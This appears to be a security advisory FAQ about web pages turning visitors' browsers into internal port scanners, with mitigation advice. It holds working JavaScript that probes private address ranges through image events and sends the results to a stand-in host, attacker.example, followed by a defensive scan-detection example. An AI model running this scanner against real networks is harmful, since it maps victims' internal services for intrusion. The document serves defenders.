- What is it?
Techniques have recently been developed for turning a user's web browser into a port-scanning engine. An attacker can use them to remotely enumerate servers and services on the internal network, bypassing the firewall, because the probes originate from a browser that is already inside it.
- How does it work?
An attacker sets up a website and entices corporate users to visit it. The site's HTML and JavaScript cause the browser to send probes (for example, image or script requests) to common internal address ranges such as the RFC 1918 private networks, and then report the results of the probes back to the attacker's web server. In this way the browser becomes a proxy into the network: the firewall sees only ordinary outbound web traffic from a trusted workstation, and the internal servers see requests from a trusted internal address.
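The probe-and-report loop described above, as an added example that is not code from the original page. It is the logic a hostile page could run inside a visitor's browser: each target is probed by loading it as an image, the event the browser raises is turned into a verdict, and the findings are sent back as a query string on another image request. The address range, port, image path, timeout and collector URL are all assumptions, and the sample results are constructed so the loop can be run outside a browser.

```javascript
// Added example, not code from the original page: the probe-and-report loop
// a hostile page could run inside a victim's browser. Host addresses, port,
// image path, timings and the collector URL are all assumptions.

const PROBE_TIMEOUT_MS = 1500;   // assumption: give up on a target after 1.5 s

// Turn the browser event a probe produced into a verdict about the target.
//   load    -> the target served a real image: a live web server
//   error   -> something answered (open port returning non-image data, or a
//              TCP reset from a closed port): a live host
//   timeout -> nothing answered within PROBE_TIMEOUT_MS: no host, or filtered
function classifyProbe(event) {
  if (event === 'load') return 'open';
  if (event === 'error') return 'alive';
  return 'silent';
}

// Browser-only probe: point an <img> at the target and watch which event fires.
// The firewall only ever sees an ordinary outbound image request from the workstation.
function browserProbe(host, port, timeoutMs = PROBE_TIMEOUT_MS) {
  return new Promise((resolve) => {
    const started = Date.now();
    const img = new Image();
    let settled = false;
    const finish = (event) => {
      if (settled) return;
      settled = true;
      resolve({ host, port, event, elapsedMs: Date.now() - started });
    };
    img.onload = () => finish('load');
    img.onerror = () => finish('error');
    setTimeout(() => finish('timeout'), timeoutMs);
    img.src = `http://${host}:${port}/favicon.ico`;   // assumed path
  });
}

// Sweep one /24 on one port. `probe` is injected so the loop can be exercised
// outside a browser (the constructed sample below does this).
async function scanRange(prefix, port, probe = browserProbe) {
  const results = [];
  for (let i = 1; i < 255; i++) {
    results.push(await probe(`${prefix}.${i}`, port));
  }
  return results;
}

// Keep only targets that answered; this is what gets sent back to the attacker.
function summarize(results) {
  return results
    .map((r) => ({ host: r.host, port: r.port, state: classifyProbe(r.event) }))
    .filter((f) => f.state !== 'silent');
}

// Exfiltrate via an image request to the attacker's server: it needs no CORS
// permission and looks like normal web traffic at the firewall.
function buildReportUrl(collectorUrl, findings) {
  return `${collectorUrl}?r=${encodeURIComponent(JSON.stringify(findings))}`;
}

// Constructed sample results (not real data) standing in for a browser run:
// 10.0.0.1 is a web server, 10.0.0.2 is alive but not serving an image, 10.0.0.3 absent.
const SAMPLE_RESULTS = [
  { host: '10.0.0.1', port: 80, event: 'load' },
  { host: '10.0.0.2', port: 80, event: 'error' },
  { host: '10.0.0.3', port: 80, event: 'timeout' },
];

// A probe that replays the constructed sample, for running the sweep offline.
function sampleProbe(host, port) {
  const hit = SAMPLE_RESULTS.find((r) => r.host === host && r.port === port);
  return { host, port, event: hit ? hit.event : 'timeout' };
}

if (typeof Image === 'undefined') {
  // Not in a browser: demonstrate the loop with the constructed probe.
  scanRange('10.0.0', 80, sampleProbe).then((results) => {
    const found = summarize(results);
    console.log(found);
    // hypothetical collector URL
    console.log(buildReportUrl('http://attacker.example/collect', found));
  });
}
```

Two details matter for the defender. The probe never needs a response the page can read: the load/error/timeout events alone leak whether something answered, so same-origin policy does not stop it. And because every request is plain HTTP from the workstation's own address, neither the perimeter firewall nor the internal server sees anything that looks different from a user browsing an intranet page.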
- Should I be worried?
Enumerating services is not in itself an attack, but it is often the precursor to one. Once the attacker knows which internal hosts and services exist, the same browser can be directed to send requests to them. Such an attack is more likely to succeed if the servers on the internal network have not been given the same priority for software vulnerability patching as internet-facing servers, since they are usually assumed to be reachable only by trusted users.
- How can I prevent it?
When patching software vulnerabilities on internal servers, consider how those services could be reached from workstations that also have internet access, and give them the same patching priority as internet-facing servers. Firewall user workstations from internal server networks and permit access only to the specific services that are required. Deploy port-scan detection and intrusion prevention on all network segments, whether or not they are internet-connected, because the probes described above originate from inside the network and never cross the perimeter.
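The detection side of the last recommendation, as an added example that is not from the original page: a sweep detector of the kind an intrusion detection sensor on an internal segment would run over connection records. It flags one source that contacts many distinct destinations on the same port inside a short window, which is exactly the pattern the browser-driven scan produces from a workstation. The window length, threshold, addresses and flow records are assumptions, and the records are constructed.

```javascript
// Added example, not code from the original page: flag a single source that
// sweeps many internal hosts on one port within a short window. Thresholds,
// addresses and the connection records below are assumptions / constructed.

const WINDOW_S = 10;           // assumption: sliding window of 10 seconds
const MIN_DISTINCT_DST = 20;   // assumption: 20 distinct hosts on one port from one source

// records: [{ ts (epoch seconds), src, dst, dport }]
// Returns one alert per (src, dport) pair that reaches the threshold.
function detectSweeps(records, windowS = WINDOW_S, threshold = MIN_DISTINCT_DST) {
  const sorted = [...records].sort((a, b) => a.ts - b.ts);

  // Group connections by source and destination port; a sweep keeps the port fixed.
  const bySrcPort = new Map();
  for (const r of sorted) {
    const key = `${r.src}|${r.dport}`;
    if (!bySrcPort.has(key)) bySrcPort.set(key, []);
    bySrcPort.get(key).push(r);
  }

  const alerts = [];
  for (const [key, rs] of bySrcPort) {
    const counts = new Map();   // dst -> connections inside the current window
    let start = 0;
    for (let end = 0; end < rs.length; end++) {
      counts.set(rs[end].dst, (counts.get(rs[end].dst) || 0) + 1);
      // Evict records that have fallen out of the window.
      while (rs[end].ts - rs[start].ts > windowS) {
        const d = rs[start].dst;
        counts.set(d, counts.get(d) - 1);
        if (counts.get(d) === 0) counts.delete(d);
        start++;
      }
      if (counts.size >= threshold) {
        const [src, dport] = key.split('|');
        alerts.push({
          src,
          dport: Number(dport),
          distinctHosts: counts.size,
          firstTs: rs[start].ts,
          lastTs: rs[end].ts,
        });
        break;   // one alert per source/port is enough
      }
    }
  }
  return alerts;
}

// Constructed records: workstation 10.1.1.50 sweeps 10.0.0.1-30 on tcp/80 in
// three seconds, alongside ordinary traffic from 10.1.1.51 to one server.
function sampleRecords() {
  const recs = [];
  for (let i = 1; i <= 30; i++) {
    recs.push({ ts: 1000 + i * 0.1, src: '10.1.1.50', dst: `10.0.0.${i}`, dport: 80 });
  }
  recs.push({ ts: 1001, src: '10.1.1.51', dst: '10.0.0.5', dport: 443 });
  recs.push({ ts: 1002, src: '10.1.1.51', dst: '10.0.0.5', dport: 443 });
  return recs;
}

// Constructed records: the same 30 hosts, but probed five seconds apart. A
// scanner that paces itself this slowly stays under a 10 s / 20 host rule.
function slowRecords() {
  const recs = [];
  for (let i = 1; i <= 30; i++) {
    recs.push({ ts: 1000 + i * 5, src: '10.1.1.50', dst: `10.0.0.${i}`, dport: 80 });
  }
  return recs;
}

console.log(detectSweeps(sampleRecords()));   // the fast sweep is reported
console.log(detectSweeps(slowRecords()));     // the paced sweep is not
```

The slow-sweep case is the caveat: a browser-based scanner controls its own pacing, so a window-and-threshold rule should be tuned for the segment (a user workstation rarely has a legitimate reason to touch twenty different servers on the same port in a minute, let alone ten seconds), and the sensor must sit where it can see workstation-to-server traffic rather than only at the internet edge.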